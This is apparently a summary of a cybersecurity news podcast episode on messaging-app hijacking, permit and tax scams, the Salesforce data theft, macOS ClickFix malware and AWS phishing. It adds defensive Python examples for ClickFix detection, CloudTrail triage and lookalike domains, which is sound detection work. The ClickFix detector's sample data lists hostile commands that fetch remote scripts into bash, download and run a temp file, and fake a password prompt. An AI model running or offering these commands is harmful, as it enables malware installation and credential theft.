CyberWire Daily – “Signals, scams, and a Salesforce snatch.”
Date: March 10, 2026
Host: Dave Bittner (N2K Networks)
Guest: Brian Baskin (Sublime Security)
Episode Overview
This episode delivers a rapid-fire roundup of the latest cybersecurity threats, defenses, and regulatory shifts affecting organizations and individuals. Major stories span Russian state hackers targeting Signal and WhatsApp accounts, permit scams impersonating local government officials, Anthropic's lawsuit over the Pentagon's supply-chain-risk designation, the Salesforce data-theft campaign, new malware targeting macOS, AWS credential phishing, and the latest in enterprise vulnerability management. The episode also features an in-depth interview with Brian Baskin, threat researcher at Sublime Security, focusing on tax-season scams and the evolution of phishing attacks using AI. It wraps up by examining the pitfalls of AI-powered "fact checkers."
Key Discussion Points
1. Russian Hackers Target Messaging Apps ([00:47])
- Summary: Russian state hackers are actively trying to compromise Signal and WhatsApp accounts belonging to government officials, military staff, and journalists, including Dutch government employees.
- Methods:
- Social engineering: Impersonating Signal support chatbots to solicit verification or PIN codes.
- Exploiting legitimate app features, such as linking attacker-controlled devices to victim accounts.
- Notable Quote:
"Dutch authorities stress that the messaging platforms themselves remain secure, but individual accounts are vulnerable."
(Dave Bittner, 01:30)
- Advice: Remain vigilant for suspicious activity, and report issues to organizational security teams.
2. Permit Scammers Impersonate Local Officials ([02:01])
- Summary: Cybercriminals are impersonating US city and county officials to dupe individuals applying for land use permits, leveraging real permit details to increase legitimacy.
- Tactics:
- Fraudulent emails from non-government domains.
- Pressured payments via wire transfer, peer-to-peer apps, or cryptocurrency.
- FBI Recommendations:
Verify sender domains, contact local government directly, and report incidents to the Internet Crime Complaint Center.
3. Anthropic’s Lawsuit Over Pentagon Blacklist ([03:01])
- Summary: Following the Pentagon's designation of Anthropic as a supply chain risk (banning its Claude AI from defense work), the company is suing to overturn the decision.
- Impact:
- “Anthropic estimates the decision could jeopardize hundreds of millions of dollars in the near term and potentially reduce its 2026 revenue by billions.”
(Dave Bittner, 03:50)
- Request: Anthropic seeks a judicial pause on policy and a formal review.
4. White House Moves on Cybercrime & Victim Restitution ([04:30])
- Summary: The Trump administration has issued an executive order ramping up the government’s fight against cybercrime, focusing on dismantling transnational scam centers and setting up victim restitution.
- Key Actions:
- Agencies to coordinate their efforts within 120 days.
- Creation of a restitution program to return seized funds to victims within 90 days.
- New operational units and intelligence sharing.
5. Salesforce “Shiny Hunters” Data Theft ([05:41])
- Summary: Salesforce reports a widespread breach campaign linked to the Shiny Hunters group, exploiting misconfigured Experience Cloud Guest user settings (unauthenticated guest profiles granted more access than intended), not platform vulnerabilities.
- Attack Tools:
- A modified Aura Inspector tool used to pull data exposed to the guest user.
- Threats: Extortion demands and data leak threats to hundreds of potential victims.
6. Ericsson Breach ([06:30])
- Summary: A breach at a third-party provider exposed personal data of over 15,000 Ericsson employees and customers.
- Details:
Potentially exposed information includes social security numbers, financial and medical data, though no misuse reported yet.
7. macOS ClickFix/Shub Stealer Malware ([07:22])
- Summary: New social engineering attack targets Mac users via a fake CleanMyMac website, using the ClickFix technique (the victim is coaxed into running a command themselves) to bypass protections.
- Attack Flow:
Victims voluntarily run malicious terminal commands, installing malware that steals system, authentication, and cryptocurrency wallet information.
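Because a ClickFix victim types or pastes the command into Terminal themselves, there is no dropped file to catch at the moment of infection; the executed command line is the evidence. The following is an added example, not code from the episode or from any vendor mentioned in it: it scores shell command lines against generic ClickFix indicators (remote script piped into a shell, base64 blob piped into a shell, download-then-chmod in a temp directory, an osascript password prompt, quarantine attribute stripped). The sample command lines, the indicator list and the weights are constructed assumptions, not a signature for the campaign described above.

```python
"""Score shell command lines for ClickFix-style indicators (added example).

A ClickFix lure talks the victim into pasting a command into Terminal, so
the command line an EDR or shell-history collector records is the place to
look. The patterns below are generic indicators, not a signature for any
one campaign; weights and thresholds are a judgement call (assumption).
"""
import re

# (weight, description, pattern)
RULES = [
    (4, "remote script piped straight into a shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")),
    (4, "base64-decoded payload piped into a shell",
     re.compile(r"base64\s+(-[dD]|--decode)[^|]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")),
    (3, "download into a temp dir, then chmod/run it",
     re.compile(r"(/tmp/|/private/tmp/|\$TMPDIR)\S*\s*(;|&&)\s*(chmod\s+\+x|open\b|(ba|z)?sh\b|/tmp/)")),
    (3, "password prompt via osascript 'with hidden answer'",
     re.compile(r"osascript\b.*display dialog.*hidden answer", re.IGNORECASE)),
    (2, "Gatekeeper quarantine attribute removed",
     re.compile(r"\bxattr\b.*(com\.apple\.quarantine|\s-c\b)")),
    (1, "bare IP address or URL shortener as download source",
     re.compile(r"https?://((\d{1,3}\.){3}\d{1,3}|bit\.ly|tinyurl\.com|t\.co)\b")),
]

# Constructed command lines (TEST-NET-2 address; the base64 is just "echo hi").
SAMPLE_COMMANDS = [
    "curl -fsSL https://198.51.100.10/cleanmymac.sh | bash",
    "echo 'ZWNobyBoaQ==' | base64 -D | bash",
    "osascript -e 'display dialog \"macOS needs your password\" default answer \"\" with hidden answer'",
    "curl -o /tmp/upd https://198.51.100.10/u && chmod +x /tmp/upd && /tmp/upd",
    "brew install --cask cleanmymac",
    "xattr -d com.apple.quarantine ~/Downloads/Report.pdf",
    "curl -O https://example.com/brochure.pdf",
]


def score(cmd: str) -> dict:
    """Sum the weights of every rule that fires and map the total to a verdict."""
    hits = [(w, d) for w, d, rx in RULES if rx.search(cmd)]
    total = sum(w for w, _ in hits)
    verdict = "likely ClickFix" if total >= 4 else "suspicious" if total >= 2 else "benign"
    return {"command": cmd, "score": total, "verdict": verdict,
            "indicators": [d for _, d in hits]}


def triage(commands) -> list:
    """Return only the command lines that tripped at least one indicator."""
    return [r for r in map(score, commands) if r["score"] > 0]


if __name__ == "__main__":
    for r in triage(SAMPLE_COMMANDS):
        print(f"[{r['verdict']:>15}] {r['score']}  {r['command']}")
        for ind in r["indicators"]:
            print(f"{'':>20}- {ind}")
```

A lone `xattr -d com.apple.quarantine` is a user unwrapping a legitimate download as often as it is malware, which is why it only scores "suspicious"; the high-confidence verdicts come from the pipe-into-shell patterns, which almost no legitimate macOS support page asks a user to run.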
8. AWS Credential Phishing via Adversary-in-the-Middle ([08:16])
- Summary: Attackers use typo-squatted domains and real-time authentication proxies to phish AWS Console credentials.
- Timeline:
Account compromise observed within 20 minutes of credential capture, with the attacker logins arriving from Mullvad VPN addresses.
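An adversary-in-the-middle proxy relays the victim's password and one-time code to the real sign-in page, so the attacker's own console session can show up in CloudTrail with MFA satisfied; the signal is where the successful login came from and what the identity did in the minutes after it. The following is an added example, not code from the episode or from AWS: it walks trimmed CloudTrail records, flags successful ConsoleLogin events from outside a known egress range, and escalates when the same identity calls a persistence-style IAM API within 30 minutes. The records, the egress range (TEST-NET-3), the API list and the window are constructed assumptions.

```python
"""Triage CloudTrail records for AiTM-style AWS console takeover (added example).

A reverse-proxy phishing kit relays the victim's password and one-time code,
so the attacker's ConsoleLogin record can carry MFAUsed "Yes". The check
therefore keys on where a successful login came from and what the same
identity did shortly afterwards, not on the MFA flag alone.
"""
import ipaddress
from datetime import datetime, timedelta, timezone

# Constructed corporate egress range and persistence API list (assumptions).
KNOWN_EGRESS = [ipaddress.ip_network("203.0.113.0/24")]
PERSISTENCE_APIS = {
    "CreateUser", "CreateAccessKey", "CreateLoginProfile", "UpdateLoginProfile",
    "AttachUserPolicy", "PutUserPolicy", "DeactivateMFADevice", "StopLogging",
}
FOLLOW_ON_WINDOW = timedelta(minutes=30)


def ev(time, name, ip, user, **extra):
    """Build a trimmed CloudTrail record with only the fields the triage reads."""
    rec = {"eventTime": time, "eventName": name, "sourceIPAddress": ip,
           "userIdentity": {"arn": f"arn:aws:iam::111122223333:user/{user}"}}
    rec.update(extra)
    return rec


LOGIN_OK = {"responseElements": {"ConsoleLogin": "Success"}}
LOGIN_FAIL = {"responseElements": {"ConsoleLogin": "Failure"}}

# Constructed sample: alice signs in from the office; eighteen minutes later
# "alice" signs in again from an unknown address with relayed MFA and mints
# an access key. bob's failed login and alice's later S3 call are noise.
SAMPLE_EVENTS = [
    ev("2026-03-09T14:02:11Z", "ConsoleLogin", "203.0.113.25", "alice",
       additionalEventData={"MFAUsed": "Yes"}, **LOGIN_OK),
    ev("2026-03-09T14:20:40Z", "ConsoleLogin", "198.51.100.77", "alice",
       additionalEventData={"MFAUsed": "Yes"}, **LOGIN_OK),
    ev("2026-03-09T14:27:03Z", "CreateAccessKey", "198.51.100.77", "alice",
       eventSource="iam.amazonaws.com"),
    ev("2026-03-09T15:10:00Z", "ConsoleLogin", "198.51.100.77", "bob",
       additionalEventData={"MFAUsed": "No"}, **LOGIN_FAIL),
    ev("2026-03-09T16:45:12Z", "ListBuckets", "203.0.113.25", "alice",
       eventSource="s3.amazonaws.com"),
]


def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def is_unexpected_source(ip: str) -> bool:
    """True for a client IP outside KNOWN_EGRESS; AWS service principals
    (e.g. "cloudtrail.amazonaws.com") are not client logins and return False."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in KNOWN_EGRESS)


def triage(events) -> list:
    """Return findings: unknown-source console logins (medium) and persistence
    API calls by the same identity within FOLLOW_ON_WINDOW of one (high).
    Note: role sessions carry assumed-role ARNs; this keys on the ARN as given."""
    findings = []
    flagged = {}  # identity arn -> (login time, source ip)
    for e in sorted(events, key=lambda r: r["eventTime"]):
        arn = e["userIdentity"]["arn"]
        ip = e["sourceIPAddress"]
        t = parse_time(e["eventTime"])
        if e["eventName"] == "ConsoleLogin":
            if e.get("responseElements", {}).get("ConsoleLogin") != "Success":
                continue  # failed logins are a separate (brute-force) story
            if not is_unexpected_source(ip):
                continue
            mfa = e.get("additionalEventData", {}).get("MFAUsed", "No")
            flagged[arn] = (t, ip)
            findings.append({"severity": "medium", "arn": arn, "ip": ip, "time": e["eventTime"],
                             "reason": f"console login from unknown source (MFAUsed={mfa})"})
        elif e["eventName"] in PERSISTENCE_APIS and arn in flagged:
            t0, ip0 = flagged[arn]
            if t - t0 <= FOLLOW_ON_WINDOW:
                mins = int((t - t0).total_seconds() // 60)
                findings.append({"severity": "high", "arn": arn, "ip": ip, "time": e["eventTime"],
                                 "reason": f"{e['eventName']} {mins} min after login from {ip0}"})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['severity']:>6} {f['time']} {f['arn']} {f['reason']}")
```

The second alice login is flagged even though MFAUsed is "Yes", which is the point: against a real-time proxy, OTP and push MFA are relayed, so the durable fix is phishing-resistant MFA (FIDO2/WebAuthn security keys bound to the real origin) rather than a rule that trusts the MFA flag.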
9. Ivanti Vulnerability – CISA Alert ([09:26])
- Summary: CISA warns of an actively exploited Ivanti Endpoint Manager flaw (authentication bypass/Cross-Site Scripting), with a federal mandate to patch within three weeks.
- Risk: “Significant risks to federal networks” – defenders urged to patch immediately.
Interview Spotlight: Brian Baskin on Tax Season Employee Impersonation Scams ([14:37–20:15])
The Tax Season Scam Landscape
- Motivation & Tactics:
“Tax season … is a great time for actors to come in, target people with … very targeted unique attacks. … It really preys upon people's fears and urgency.”
(Brian Baskin, 14:37)
- Criminals capitalize on deadline panic and trust in government communications.
- Attackers don’t even need to invent urgency—the IRS and tax deadlines do it for them.
Types of Scams Observed ([16:07])
- Impersonation Attacks:
- Pretending to be the IRS, requesting personal info, “updated” forms or W2s.
- Delivery Methods:
- Malicious attachments (e.g., PDFs)
- Fake websites, phishing forms.
- Two Target Audiences:
“One is … your more consumer-level person … typically smaller amounts of money, … versus your more enterprise-level person … in charge of tens of thousands of dollars [and] get the much more complicated and sophisticated attacks.”
(Brian Baskin, 17:05)
Defending the Organization ([17:44–19:55])
- Phishing Is More Convincing Than Ever:
- Advances in AI enable nearly flawless language in phishing emails.
- Classic signals of scam emails (bad grammar, spelling mistakes) are no longer reliable.
- “Modern phishing is actually operationally mature. We moved away from the sloppy attacks.”
- Key User Advice:
- Scrutinize destination URLs, QR codes, callback numbers.
- Cross-check official contacts via independent search.
- Organization Defenses:
- Strong email security tools.
- Multi-factor authentication for sensitive portals (like HR).
- Rigid internal policies for financial requests (e.g., layered approvals).
- Staff Education:
“A real educational component here [is] making your employees aware of these things.”
(Dave Bittner, 19:12)
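Three stories on this page come back to the same check: the FBI's advice to verify sender domains on permit e-mails, the typo-squatted AWS sign-in domains, and Baskin's point that the real protection is knowing where a link leads. The following is an added example, not code from the episode or from any of the organizations named: it takes a URL or sender address, decodes any punycode host, folds visually confusable characters, and compares the registrable domain against a small allowlist to report a homoglyph, a typosquat, a brand buried in an unrelated domain, or a clean match. The allowlist, the confusable table and the last-two-labels approximation of the registrable domain are assumptions; a real deployment would use the Public Suffix List and the Unicode confusables data.

```python
"""Lookalike-domain triage for links and sender addresses (added example).

Stdlib only. The registrable domain is approximated as the last two labels,
which is wrong for suffixes like .co.uk; production code should use the
Public Suffix List and the full Unicode TR39 confusables table.
"""
import re
from urllib.parse import urlsplit

# Constructed allowlist of domains treated as legitimate (assumption).
LEGIT_DOMAINS = ("amazon.com", "amazonaws.com", "irs.gov", "signal.org")

# Tiny confusable table: digits and Cyrillic/Greek letters that render like Latin.
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",  # Cyrillic
    "\u03b1": "a", "\u03bf": "o",                                               # Greek
})


def skeleton(domain: str) -> str:
    """Fold visually confusable characters to a canonical ASCII-ish form."""
    return domain.lower().translate(CONFUSABLES).replace("rn", "m").replace("vv", "w")


def extract_host(target: str) -> str:
    """Accept a URL, a bare host, or an e-mail address; return the host part."""
    if "@" in target and "://" not in target:
        return target.rsplit("@", 1)[1].strip().lower()
    if "://" not in target:
        target = "//" + target
    host = urlsplit(target).hostname
    if not host:
        raise ValueError(f"no host in {target!r}")
    return host


def to_unicode(host: str) -> str:
    """Decode punycode (xn--) labels so homoglyphs become visible to skeleton()."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host  # already Unicode, or malformed: keep as-is


def registrable(host: str) -> str:
    return ".".join(host.rstrip(".").split(".")[-2:])


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(target: str) -> dict:
    """Verdicts in decreasing severity: homoglyph, typosquat, brand-in-domain,
    then unrelated; an exact allowlist match (or subdomain of one) is legitimate."""
    host = to_unicode(extract_host(target))
    reg = registrable(host)
    if any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS):
        return {"host": host, "verdict": "legitimate", "match": reg}
    reg_sk = skeleton(reg)
    sld_tokens = set(re.split(r"[^a-z0-9]+", reg_sk.split(".")[0]))

    def brand_hit(legit: str) -> bool:
        brand = legit.split(".")[0]
        return brand in sld_tokens or (len(brand) >= 5 and brand in reg_sk)

    checks = (
        ("homoglyph", lambda l: reg_sk == skeleton(l) and reg != l),
        ("typosquat", lambda l: 0 < levenshtein(reg_sk, skeleton(l)) <= 2),
        ("brand-in-domain", brand_hit),
    )
    for verdict, test in checks:
        for legit in LEGIT_DOMAINS:
            if test(legit):
                return {"host": host, "verdict": verdict, "match": legit}
    return {"host": host, "verdict": "unrelated", "match": None}


if __name__ == "__main__":
    for t in ("https://us-east-1.console.aws.amazon.com/", "https://signin.aws-amazon.com/console",
              "http://amazom.com", "https://signal.0rg/download", "noreply@irs-gov.com",
              "https://\u0430mazon.com/ap/signin", "https://example.org/permits"):
        print(f"{t:<45} -> {classify(t)}")
```

"unrelated" only means the domain resembles nothing on the allowlist; a permit scam sent from a generic domain still fails the FBI's test because it is not the county's domain, which is why the allowlist has to be the organization's own list of trusted senders rather than a generic one.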
AI and Fact-Checking: Who Watches the Watchers? ([21:54])
- Insight by Dorsof Salemi (University of Montreal):
- AI-based fake news detectors do not truly verify facts. They identify patterns based on (sometimes biased) training data.
- Key Problem:
“Instead, they calculate probabilities … behave less like journalists and more like mirrors, reflecting … biases and gaps … in the data.”
(Dave Bittner, 21:59)
- Risks: Biases and non-transparent definitions of misinformation.
- Proposed Solution:
Human-centered tools that show sources and explanations, keeping judgment with the user—not the algorithm.
Notable Quotes & Memorable Moments
- On tax phishing sophistication:
“Modern phishing is actually operationally mature. ... They're using legitimate services, legitimate emails. So the real protection comes from knowing where that email is leading you.”
(Brian Baskin, 18:38)
- On urgency and human fallibility:
“The IRS has really put the fear out there ... a lot of people fear that if they don’t [file by the deadline], big, horrible things were going to happen ... but the IRS doesn’t actually happen that fast.”
(Brian Baskin, 15:21)
- On AI fact-checkers:
“Those promises are doing a bit of exaggerating themselves. … [AI fact checkers] behave less like journalists and more like mirrors.”
(Dave Bittner, 21:54)
Timestamps for Key Segments
- 00:47: Russian hackers target Signal/WhatsApp
- 02:01: Permit phishing campaign
- 03:01: Anthropic sues Pentagon
- 04:30: White House anti-cybercrime order
- 05:41: Salesforce/Shiny Hunters campaign
- 06:30: Ericsson third-party breach
- 07:22: macOS ClickFix/Shub Stealer campaign
- 08:16: AWS adversary-in-the-middle phishing
- 09:26: CISA/Ivanti high-risk vulnerability
- 14:37–20:15: Brian Baskin interview – tax season scams
- 21:54: AI fact-checking limitations
Conclusion
This episode underscores a crucial theme: attack sophistication is rising, driven by improved social engineering and AI, even as organizations race to defend themselves with both technology and policy. From government agencies to global enterprises and individual taxpayers, the threat landscape is increasingly relentless—and demands vigilance, layered defenses, and critical thinking, especially in the age of AI-fueled misinformation.
For more details, visit theCyberWire.com and check out the daily briefing for source links.
